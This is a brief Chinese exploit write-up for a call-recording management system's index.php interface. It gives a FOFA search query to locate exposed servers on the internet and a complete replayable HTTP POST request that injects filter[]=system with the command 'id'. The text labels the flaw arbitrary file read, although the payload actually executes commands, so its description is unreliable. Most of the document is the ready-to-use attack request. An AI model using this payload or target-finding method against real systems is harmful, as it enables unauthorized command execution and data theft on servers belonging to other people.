申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。我们去fofa中用如下语法进行搜索
title="在线录音管理系统"
开启抓包后任意访问其中一个网站
将数据包右键发送到重放器,并将其替换为如下数据包,其中127.0.0.1位置为访问的ip地址
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52s=id&_method=__construct&method=POST&filter[]=system
然后点击发送,即可看到查询的内容